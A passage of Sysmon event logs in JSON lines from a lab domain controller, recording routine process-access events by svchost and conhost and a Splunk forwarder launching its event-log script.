{41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2121,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2122,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2123,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2124,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2125,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2126,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.314\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-0010CCD60300}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.314","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-0010CCD60300}","TargetProcessId":"4028","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2127,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.443\r\nProcessGuid: {41C8662E-1F78-5F25-0000-001055F70300}\r\nProcessId: 3944\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinEventLog.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.443","ProcessGuid":"{41C8662E-1F78-5F25-0000-001055F70300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinEventLog.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2128,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.439\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F78-5F25-0000-001055F70300}\r\nTargetProcessId: 3944\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 